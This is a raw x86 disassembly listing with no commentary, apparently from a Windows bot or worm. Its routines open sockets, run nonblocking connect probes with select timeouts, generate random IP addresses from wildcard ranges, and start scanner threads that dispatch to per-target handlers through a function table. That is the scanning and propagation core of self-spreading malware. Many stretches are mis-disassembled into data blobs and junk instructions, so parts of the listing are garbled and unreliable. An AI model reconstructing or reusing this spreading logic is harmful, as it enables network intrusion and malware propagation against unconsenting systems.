jbe short loc_40489C
loc_404886: ; CODE XREF: sub_404873+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_404890
mov byte ptr [esi+edi], 2Fh
loc_404890: ; CODE XREF: sub_404873+17�j
push edi
inc esi
call sub_410B60
cmp esi, eax
pop ecx
jb short loc_404886
loc_40489C: ; CODE XREF: sub_404873+11�j
mov eax, edi
pop edi
pop esi
retn
sub_404873 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048A1 proc near ; CODE XREF: seg000:0040B5C5�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call ds:dword_430718
push 6
push 1
push 2
call ds:dword_430810
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_410590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call ds:dword_430794
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40731F
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_430740
cmp eax, 0FFFFFFFFh
jz short loc_40497E
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_40491A
mov eax, offset dword_42F3E8
loc_40491A: ; CODE XREF: sub_4048A1+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset dword_41FDE4
push esi
push eax
call sub_410A8A
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_4307E0
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_4105F0
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call ds:dword_4307AC
pop esi
loc_40497E: ; CODE XREF: sub_4048A1+6B�j
push ebx
call ds:dword_430828
call ds:dword_430700
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_41050B
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_4049BE
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_4049BE: ; CODE XREF: sub_4048A1+102�j
pop edi
pop ebx
leave
retn
sub_4048A1 endp
; ---------------------------------------------------------------------------
loc_4049C2: ; CODE XREF: seg000:loc_404EAD�p
; DATA XREF: seg000:00405101�o ...
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+8]
mov esi, offset dword_41FFB4
lea edi, [ebp-1Ch]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp-37Ch]
push ebx
push 2
rep movsd
inc dword ptr [ebp-16Ch]
push 2
mov [ebp-0Ch], eax
mov [edx+2A0h], eax
call ds:dword_430810
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp-10h], edi
jnz short near ptr loc_404A84+1
push 190h
call ds:dword_41C058 ; Sleep
call ds:dword_430730
push eax
lea eax, [ebp-780h]
push offset dword_41FF6C
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-0E0h], ebx
jnz short loc_404A65
push ebx
lea eax, [ebp-780h]
push dword ptr [ebp-0E4h]
push eax
lea eax, [ebp-164h]
push eax
push dword ptr [ebp-37Ch]
call sub_40E367
add esp, 14h
loc_404A65: ; CODE XREF: seg000:00404A40�j
lea eax, [ebp-780h]
push eax
call sub_407E0E
push dword ptr [ebp-170h]
call sub_4102D3
pop ecx
pop ecx
push ebx
call near ptr 3D0000h
loc_404A84: ; CODE XREF: seg000:00404A12�j
aam 8Bh
test [eax+6AFFFFFEh], edx
adc [ecx-40h], ch
xor al, 2
; ---------------------------------------------------------------------------
db 2 dup(0), 53h
; ---------------------------------------------------------------------------
mov ds:dword_4358E4[eax], edi
lea eax, [ebp-44h]
push eax
call sub_410590
add esp, 0Ch
mov word ptr [ebp-44h], 2
push dword ptr [ebp-168h]
call ds:dword_430794
mov [ebp-42h], ax
lea eax, [ebp-44h]
push 10h
push eax
push edi
mov [ebp-40h], ebx
call ds:dword_4307C0
cmp eax, 0FFFFFFFFh
jnz short loc_404AEA
push 1388h
call ds:dword_41C058 ; Sleep
dec dword ptr [ebp-16Ch]
push dword ptr [ebp+8]
jmp loc_404EAD
; ---------------------------------------------------------------------------
loc_404AEA: ; CODE XREF: seg000:00404ACF�j
lea eax, [ebp-378h]
push offset dword_41F660
push eax
call sub_411B4E
pop ecx
cmp eax, ebx
pop ecx
mov [ebp-8], eax
jnz short near ptr loc_404B67+1
push 190h
call ds:dword_41C058 ; Sleep
lea eax, [ebp-378h]
push eax
lea eax, [ebp-780h]
push offset dword_41FF1C
push eax
call sub_41050B
loc_404B27: ; CODE XREF: seg000:loc_404B67�j
push ebx
lea eax, [ebp-780h]
push dword ptr [ebp-0E4h]
push eax
lea eax, [ebp-164h]
push eax
push dword ptr [ebp-37Ch]
call sub_40E367
lea eax, [ebp-780h]
push eax
call sub_407E0E
push dword ptr [ebp-170h]
call sub_4102D3
add esp, 28h
push ebx
call near ptr 3D0000h
loc_404B67: ; CODE XREF: seg000:00404B02�j
jp short loc_404B27
add [edx], al
; ---------------------------------------------------------------------------
db 0
dd 8458B00h, 2A09839h, 840F0000h, 2F1h, 0F780BD89h, 80BFFFFFh
dd 57000000h, 0FF28858Dh, 5053FFFFh, 5CC45C7h, 0C7000000h
dd 1388D045h, 85C70000h, 0FFFFF77Ch, 1, 0B9E3E8h, 0CC48300h
dd 50CC458Dh, 7C858D53h, 53FFFFF7h, 15FF5350h, 43077Ch
dd 8E0FC085h, 295h, 42F3E8A0h, 88CF8B00h, 0FFFA8085h, 8DC033FFh
dd 0FFFA81BDh, 0FC45C7FFh, 10h, 0AB66ABF3h, 0F07D8BAAh
dd 50FC458Dh, 50D4458Dh, 28858D53h, 68FFFFFFh, 80h, 15FF5750h
dd 43076Ch, 89D875FFh, 15FFF445h, 43081Ch, 0A8458D50h
dd 0B8E9E850h, 9D380000h, 0FFFFFF28h, 850F5959h, 21Bh
dd 0FF29BD80h, 0F01FFFFh, 15A85h, 8C858D00h, 50FFFFFDh
dd 0BF17E8h, 5848D00h, 0FFFFFF2Bh, 8DEC4589h, 0FFFD8C85h
dd 1E850FFh, 500000BFh, 0FF2A858Dh, 8D50FFFFh, 0FFFD8C85h
dd 1DE850FFh, 830000D2h, 0C08514C4h, 0D3850Fh, 458D0000h
dd 0D9E850E4h, 500000BEh, 0FFE4458Dh, 0E850EC75h, 0D1FCh
dd 8510C483h, 0B2850FC0h, 53000000h, 0F875FF53h, 0D155E8h
dd 0F875FF00h, 0FA84858Dh, 9D88FFFFh, 0FFFFFA80h, 0FA8185C6h
dd 5603FFFFh, 8850016Ah, 0FFFA829Dh, 8385C6FFh, 1FFFFFAh
dd 0CD71E8h, 1CC48300h, 89D44D8Dh, 0C083F445h, 0FC75FF04h
dd 8D505351h, 0FFFA8085h, 0FF5750FFh, 4307F415h, 88858D00h
dd 50FFFFFCh, 50A8458Dh, 41FEC868h, 80858D00h, 50FFFFF8h
dd 0B7FAE8h, 10C48300h, 0FF209D39h, 2375FFFFh, 80858D53h
dd 0FFFFFFF8h, 0FFFF1CB5h, 858D50FFh, 0FFFFFE9Ch, 84B5FF50h
dd 0E8FFFFFCh, 962Bh, 8D14C483h, 0FFF88085h, 0C3E850FFh
dd 59000030h, 110E9h, 0FC75FF00h, 50D4458Dh, 68136A53h
dd 41FEB4h, 0F415FF57h, 8D004307h, 0FFFD8C85h, 458D50FFh
dd 858D50A8h, 0FFFFFF28h, 41FE7868h, 88E85000h, 8D0000B7h
dd 0FFFF2885h, 7FE850FFh, 83000030h, 0CAE914C4h, 80000000h
dd 0FFFF29BDh, 850F04FFh, 0A7h, 0FF2B8D8Ah, 858AFFFFh
dd 0FFFFFF2Ah, 88FFF980h, 0FFFA809Dh, 8185C6FFh, 3FFFFFAh
dd 0C0FE1275h, 8588C932h, 0FFFFFA82h, 0FA839D88h, 0EEBFFFFh
dd 8588C1FEh, 0FFFFFA82h, 0FA838D88h, 0B60FFFFFh, 0C9B60FC0h
dd 308E0C1h, 0E0C153C1h, 50C62B09h, 0E8F875FFh, 0D002h
dd 8DF875FFh, 0FFFA8485h, 16A56FFh, 0CC38E850h, 0C4830000h
dd 8DF88B1Ch, 7D89D445h, 0FC75FFF4h, 4478D50h, 858D5053h
dd 0FFFFFA80h, 0F075FF50h, 7F415FFh, 0FB3B0043h, 858D2B75h
dd 0FFFFFC88h, 0A8458D50h, 0FE286850h, 0BAE90041h, 0FFFFFFFEh
dd 458DFC75h, 6A5350D4h, 0FE1C6809h, 0FF570041h, 4307F415h
dd 0F45D3900h, 0FF07D8Bh, 0FFFD008Fh, 15FF57FFh, 430828h
dd 0E8F875FFh, 0CB74h, 0FF08758Bh, 0FFFE948Dh, 9E3959FFh
dd 2A0h, 0B5FF1375h, 0FFFFFE90h, 0B43AE8h, 0E8535900h
dd 0FFFCB160h, 3E86832h, 15FF0000h, 41C058h
; ---------------------------------------------------------------------------
push esi
loc_404EAD: ; CODE XREF: seg000:00404AE5�j
call loc_4049C2
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EB9 proc near ; CODE XREF: seg000:0040DFF2�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset dword_4200BC
push eax
xor ebx, ebx
call sub_41050B
cmp ds:dword_41FFE8, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_404F27
push esi
mov esi, offset dword_41FFF0
loc_404EEC: ; CODE XREF: sub_404EB9+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset dword_4200B0
push eax
call sub_41050B
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_411ED0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_404EEC
pop esi
loc_404F27: ; CODE XREF: sub_404EB9+2B�j
push ds:dword_45EBC8
call sub_40787D
push eax
push ebx
lea eax, [ebp+var_400]
push offset dword_42009C
push eax
call sub_41050B
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_411ED0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
lea eax, [ebp+var_200]
push eax
call sub_407E0E
add esp, 38h
pop edi
pop ebx
leave
retn
sub_404EB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F83 proc near ; CODE XREF: seg000:0040D9A7�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_4101FF
test eax, eax
pop ecx
jle short loc_404FBF
mov eax, [ebp+arg_C]
push ds:dword_42F3F8[eax*8]
call ds:dword_43081C
push eax
lea eax, [ebp+var_200]
push offset dword_420128
push eax
call sub_41050B
add esp, 0Ch
jmp short loc_404FD2
; ---------------------------------------------------------------------------
loc_404FBF: ; CODE XREF: sub_404F83+13�j
lea eax, [ebp+var_200]
push offset dword_4200F4
push eax
call sub_41050B
pop ecx
pop ecx
loc_404FD2: ; CODE XREF: sub_404F83+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
lea eax, [ebp+var_200]
push eax
call sub_407E0E
add esp, 18h
leave
retn
sub_404F83 endp
; ---------------------------------------------------------------------------
loc_404FFA: ; CODE XREF: sub_40550F+263�p
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+138h]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40538A
imul eax, 3Ch
xor ebx, ebx
cmp ds:dword_41FFF4[eax], ebx
jz loc_40526B
push 4
call sub_4101FF
test eax, eax
pop ecx
jnz loc_40538A
mov eax, ds:dword_422FF8
push edi
mov edi, offset dword_42FD74
push 104h
push edi
push ebx
mov ds:dword_42FF84, eax
mov ds:dword_42FF80, ebx
call near ptr 3D0000h
; ---------------------------------------------------------------------------
db 0DDh
; ---------------------------------------------------------------------------
push 103h
mov esi, offset dword_42FE78
push offset byte_423068
push esi
call sub_411D00
mov eax, [ebp+118h]
add esp, 0Ch
cmp [ebp+98h], bl
mov ds:dword_42FD70, eax
mov eax, [ebp+140h]
push 7Fh
mov ds:dword_430008, eax
jnz short loc_4050AD
lea eax, [ebp+18h]
push eax
push offset dword_42FF88
call sub_411D00
add esp, 0Ch
mov ds:dword_43000C, 1
jmp short loc_4050C7
; ---------------------------------------------------------------------------
loc_4050AD: ; CODE XREF: seg000:0040508E�j
lea eax, [ebp+98h]
push eax
push offset dword_42FF88
call sub_411D00
add esp, 0Ch
mov ds:dword_43000C, ebx
loc_4050C7: ; CODE XREF: seg000:004050AB�j
push esi
push edi
push ds:dword_42FF84
lea eax, [ebp-204h]
push offset dword_4202D4
push eax
call sub_41050B
push ebx
lea eax, [ebp-204h]
push 4
push eax
call sub_40FFB7
add esp, 20h
mov ds:dword_42FF7C, eax
lea eax, [ebp-4]
push eax
push ebx
push offset dword_42FD70
push offset loc_4049C2
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, ds:dword_42FF7C
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_405136
loc_405124: ; CODE XREF: seg000:00405134�j
cmp ds:dword_430010, ebx
jnz short loc_405151
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_405124
; ---------------------------------------------------------------------------
loc_405136: ; CODE XREF: seg000:00405122�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-204h]
push offset dword_42028C
push eax
call sub_41050B
add esp, 0Ch
loc_405151: ; CODE XREF: seg000:0040512A�j
lea eax, [ebp-204h]
push eax
call sub_407E0E
mov edi, offset dword_4303CC
mov dword ptr [esp], 104h
push edi
push ebx
mov ds:dword_4305D8, ebx
call near ptr 3D0000h
dec ebx
push 103h
mov esi, offset dword_4304D0
push offset byte_423068
push esi
call sub_411D00
mov eax, [ebp+118h]
add esp, 0Ch
cmp [ebp+98h], bl
mov ds:dword_4303C8, eax
mov eax, [ebp+140h]
push 7Fh
mov ds:dword_430660, eax
jnz short loc_4051CC
lea eax, [ebp+18h]
push eax
push offset dword_4305E0
call sub_411D00
add esp, 0Ch
mov ds:dword_430664, 1
jmp short loc_4051E6
; ---------------------------------------------------------------------------
loc_4051CC: ; CODE XREF: seg000:004051AD�j
lea eax, [ebp+98h]
push eax
push offset dword_4305E0
call sub_411D00
add esp, 0Ch
mov ds:dword_430664, ebx
loc_4051E6: ; CODE XREF: seg000:004051CA�j
push esi
push edi
push ds:dword_4305DC
lea eax, [ebp-204h]
push offset dword_420238
push eax
call sub_41050B
push ebx
lea eax, [ebp-204h]
push 5
push eax
call sub_40FFB7
add esp, 20h
mov ds:dword_4305D4, eax
lea eax, [ebp-4]
push eax
push ebx
push offset dword_4303C8
push offset sub_40318D
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, ds:dword_4305D4
pop edi
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40525A
loc_405244: ; CODE XREF: seg000:00405258�j
cmp ds:dword_430668, ebx
jnz loc_40537D
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_405244
; ---------------------------------------------------------------------------
loc_40525A: ; CODE XREF: seg000:00405242�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_4201F4
jmp loc_40536E
; ---------------------------------------------------------------------------
loc_40526B: ; CODE XREF: seg000:0040501F�j
cmp ds:dword_41FFF8[eax], ebx
jz loc_40538A
push 3
call sub_4101FF
test eax, eax
pop ecx
jnz loc_40538A
mov esi, offset dword_4302A4
push 104h
push esi
push ebx
call near ptr 3D0000h
add eax, 0E8565C6Ah
pop edi
int 0 ; - internal hardware - DIVIDE ERROR
; Automatically called at end of DIV or IDIV operation that results in error
; or overflow. Normally set by DOS to display an error message and abort
; the program.
add [ecx+3Bh], bl
retn
; ---------------------------------------------------------------------------
pop ecx
jz short loc_4052A9
mov [eax], bl
loc_4052A9: ; CODE XREF: seg000:004052A5�j
mov eax, ds:dword_422FFC
mov ds:dword_4303BC, ebx
mov ds:dword_4303A8, eax
lea eax, [ebp+18h]
push eax
push offset dword_43001C
call sub_41050B
mov eax, [ebp+118h]
pop ecx
pop ecx
mov ds:dword_430018, eax
mov ecx, [ebp+140h]
push esi
push ds:dword_4303A8
mov ds:dword_4303B4, ecx
mov ecx, [ebp+144h]
push eax
mov ds:dword_4303B8, ecx
call sub_407435
pop ecx
push eax
lea eax, [ebp-204h]
push offset dword_4201A4
push eax
call sub_41050B
push ebx
lea eax, [ebp-204h]
push 3
push eax
call sub_40FFB7
add esp, 20h
mov ds:dword_4303B0, eax
lea eax, [ebp-4]
push eax
push ebx
push offset dword_430018
push offset sub_4038A7
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, ds:dword_4303B0
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_405362
loc_405350: ; CODE XREF: seg000:00405360�j
cmp ds:dword_4303C4, ebx
jnz short loc_40537D
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_405350
; ---------------------------------------------------------------------------
loc_405362: ; CODE XREF: seg000:0040534E�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42015C
loc_40536E: ; CODE XREF: seg000:00405266�j
lea eax, [ebp-204h]
push eax
call sub_41050B
add esp, 0Ch
loc_40537D: ; CODE XREF: seg000:0040524A�j
; seg000:00405356�j
lea eax, [ebp-204h]
push eax
call sub_407E0E
pop ecx
loc_40538A: ; CODE XREF: seg000:0040500E�j
; seg000:0040502F�j ...
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538E proc near ; CODE XREF: sub_40550F:loc_405580�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:42F3F8h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_4105F0
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_4306D8
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_430790
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_4105F0
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40538E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053D6 proc near ; CODE XREF: sub_40550F+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_410B60
cmp eax, 0Fh
pop ecx
jbe short loc_4053FE
xor eax, eax
jmp short loc_40546F
; ---------------------------------------------------------------------------
loc_4053FE: ; CODE XREF: sub_4053D6+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset dword_420328
push [ebp+arg_0]
call sub_4118E0
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40542B
call sub_410567
mov [ebp+var_C], eax
loc_40542B: ; CODE XREF: sub_4053D6+4B�j
cmp [ebp+var_8], esi
jnz short loc_405438
call sub_410567
mov [ebp+var_8], eax
loc_405438: ; CODE XREF: sub_4053D6+58�j
cmp [ebp+var_4], esi
jnz short loc_405445
call sub_410567
mov [ebp+var_4], eax
loc_405445: ; CODE XREF: sub_4053D6+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_405451
call sub_410567
loc_405451: ; CODE XREF: sub_4053D6+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov ds:dword_42F3F8[ecx*8], eax
loc_40546F: ; CODE XREF: sub_4053D6+26�j
pop esi
leave
retn
sub_4053D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405472 proc near ; CODE XREF: sub_40550F+B8�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call ds:dword_430810
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40549B
xor eax, eax
jmp short loc_40550A
; ---------------------------------------------------------------------------
loc_40549B: ; CODE XREF: sub_405472+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call ds:dword_430794
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call ds:dword_43082C
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call ds:dword_430740
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call ds:dword_43077C
push esi
mov edi, eax
call ds:dword_430828
xor eax, eax
cmp edi, ebx
setnle al
loc_40550A: ; CODE XREF: sub_405472+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_405472 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40550F proc near ; DATA XREF: sub_40550F+34F�o
var_29C = dword ptr -29Ch
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_1CC = byte ptr -1CCh
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_14C = byte ptr -14Ch
var_140 = byte ptr -140h
var_13C = byte ptr -13Ch
var_C0 = byte ptr -0C0h
var_75 = byte ptr -75h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
mov ebx, esi
pop ecx
imul ebx, 234h
loc_405556: ; CODE XREF: sub_40550F+200�j
mov eax, ds:dword_4358DC[ebx]
cmp ds:dword_42F3FC[eax*8], 0
jz loc_405714
cmp [ebp+var_10], 0
push eax
jz short loc_405580
lea eax, [ebp+var_150]
push eax
call sub_4053D6
pop ecx
jmp short loc_405585
; ---------------------------------------------------------------------------
loc_405580: ; CODE XREF: sub_40550F+60�j
call sub_40538E
loc_405585: ; CODE XREF: sub_40550F+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push ds:dword_4358DC[ebx]
push [ebp+var_3C]
push edi
call ds:dword_43081C
push eax
lea eax, [ebp+var_28C]
push offset dword_420370
push eax
call sub_41050B
lea eax, [ebp+var_28C]
push eax
lea eax, dword_4356D8[ebx]
push eax
call sub_41050B
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_405472
add esp, 2Ch
cmp eax, 1
jnz loc_405704
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_405659
push offset dword_42FD58
call ds:dword_41C0A0 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call ds:dword_43081C
push eax
lea eax, [ebp+var_28C]
push offset dword_420334
push eax
call sub_41050B
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40563B
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_40562F
lea eax, [ebp+var_140]
loc_40562F: ; CODE XREF: sub_40550F+118�j
push eax
push [ebp+var_40]
call sub_40E367
add esp, 14h
loc_40563B: ; CODE XREF: sub_40550F+FD�j
lea eax, [ebp+var_28C]
push eax
call sub_407E0E
mov [esp+29Ch+var_29C], offset dword_42FD58
call ds:dword_41C09C ; RtlLeaveCriticalSection
jmp loc_405704
; ---------------------------------------------------------------------------
loc_405659: ; CODE XREF: sub_40550F+CD�j
push edi
call ds:dword_43081C
push eax
lea eax, [ebp+var_208]
push eax
call sub_41050B
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset dword_41FFC0
push eax
lea eax, [ebp+var_178]
push eax
call sub_41050B
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_40569D
lea eax, [ebp+var_140]
loc_40569D: ; CODE XREF: sub_40550F+186�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_41050B
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call ds:dword_41FFEC[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_405704: ; CODE XREF: sub_40550F+C3�j
; sub_40550F+145�j
push 7D0h
call ds:dword_41C058 ; Sleep
jmp loc_405556
; ---------------------------------------------------------------------------
loc_405714: ; CODE XREF: sub_40550F+55�j
push esi
call sub_4102D3
pop ecx
push 0
call near ptr 3D0000h
mov [ebp+var_75], dl
in al, dx
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call ds:dword_4307D0
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov ds:dword_42F3F8[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call loc_404FFA
push 8
call sub_4101FF
add esp, 150h
cmp eax, ebx
jnz short loc_4057F1
mov esi, offset dword_42FD58
push esi
call ds:dword_41C0A8 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_41C0A4 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_4057F1
lea eax, [ebp+var_1CC]
push offset dword_4204B4
push eax
call sub_41050B
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_4057DB
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40E367
add esp, 14h
loc_4057DB: ; CODE XREF: sub_40550F+2AD�j
lea eax, [ebp+var_1CC]
push eax
call sub_407E0E
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4057F1: ; CODE XREF: sub_40550F+277�j
; sub_40550F+293�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_41C058
mov edi, ebx
mov ds:dword_42F3FC[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_4058BE
loc_40580F: ; CODE XREF: sub_40550F+3A9�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset dword_420468
push eax
call sub_41050B
push ebx
lea eax, [ebp+var_1CC]
push 8
push eax
call sub_40FFB7
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
